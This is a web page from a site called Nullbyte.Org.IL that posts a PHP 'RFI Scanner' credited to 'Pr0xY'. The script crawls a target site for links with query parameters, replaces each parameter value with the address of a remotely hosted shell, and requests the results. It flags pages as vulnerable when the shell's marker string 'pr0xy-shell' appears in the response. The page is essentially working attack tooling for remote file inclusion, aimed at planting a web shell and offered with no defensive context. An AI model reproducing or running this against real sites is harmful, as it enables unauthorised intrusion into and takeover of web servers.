Nullbyte.Org.IL :: RFI Scanner

RFI Scanner

<pre>
<?php

#Rfi scanner network v 1.0
 #Powered by Pr0xY :)
 
 class Rfi_Scanner
 {
 	var $site;
 	
 	function __construct($site)
 	{
 		$this->site = $site;
 	}
 	
 	function getAllLinks()
 	{
 		$file = "([-a-z0-9@_+*]+)(\.[-a-z0-9@_+*]+)+";
 		$gets = "((\?|\&)([-a-z0-9@_+*]+)\=([-a-z0-9@_+*\/\\\]*))+"; 	
 		
 		if($html = @file_get_contents($this->site))
		{
			preg_match_all("/((https?\:\/\/)?(www.)?[-a-z0-9@_+]+(\.[-a-z0-9@_+]+)+)?(\/[-a-z0-9@_+]*\/)*{$file}{$gets}/i", $html, $links);
		 	
		 	$found_links = array();
		 	
		 	for($i = 0; $i < count($links[0]); $i++)
		 	
		 		if(!in_array($links[0][$i], $found_links))
		 			$found_links[] = $links[0][$i];
		 	
			$clean = array();
		
		 	foreach($found_links as $fl)
		 	{
		 		preg_match("/.*{$file}\?/i", $fl, $la);
		 		 		
		 		if(!isset($clean[$la[0]]))
		 		{
		 			$clean[$la[0]] = array();
		 			$clean[$la[0]]['gets'] = array();
		 			$clean[$la[0]]['values'] = array();
				}
				preg_match_all("/(([-a-z0-9@_+*]+)\=([-a-z0-9@_+*\/\\\]*))+/i", $fl, $get);
		
		 		for($i = 0; $i < count($get[2]); $i++)
		 		{ 			
		 			if(!in_array($get[2][$i], $clean[$la[0]]['gets']))
		 			{
		 				$clean[$la[0]]['gets'][] = $get[2][$i];
		 				$clean[$la[0]]['values'][] = $get[3][$i];
					}
		 		}
		 			
		 	}
		 	return $clean;
 		}
 		return false;
 	}
 	
 	function smart_InsertLink($links, $whatInsert)
 	{
 		$total_links = array();
 		
 		while($la = current($links))
 		{ 						
			if(count($la['gets']) > 1)
			{				
				for($i = 0; $i < count($la['gets']); $i++)
				{		
					$link = (preg_match("/^http/", key($links))) ? key($links) : $this->site.key($links);
								
					if($i > 0)
					{
						for($j = $i; $j >= 0; $j--)
						{
							$link .= ($j < $i) ? '&'.$la['gets'][$j].'=' : $la['gets'][$j].'=';
							$link .= ($j == $i) ? $whatInsert : $la['values'][$j];
						}
					}
					else 
					{
						for($k = 0; $k < count($la['gets']); $k++)
						{
							$link .= ($k > 0) ? '&'.$la['gets'][$k].'=' : $la['gets'][$k].'=';
							$link .= ($k == $i) ? $whatInsert : $la['values'][$k];
						}
					}
					
					$total_links[] = $link;	
				}
			}
			else $total_links[] = ((preg_match("/^http/", key($links))) ? key($links) : $this->site.key($links)).$la['gets'][0].'='.$whatInsert;	
 			
 			next($links);
 		}
 		return $total_links;

}
 	
 }

$link = "";
 $shellAddress = "";
 $whatFind = "pr0xy-shell";
 
 $pBot = new Rfi_Scanner($link);
 
 if($links = $pBot->getAllLinks())
 {
 	$rfis = $pBot->smart_InsertLink($links, $shellAddress);
 	
 	foreach($rfis as $rfi)
 	{
 		echo $rfi.' - ';

if(preg_match("/{$whatFind}/i", @file_get_contents($rfi)))
 			echo 'RFI!';
 		else
			echo 'Clean';
		echo "\n";		
 	}
 }
 
?>
</pre>

Back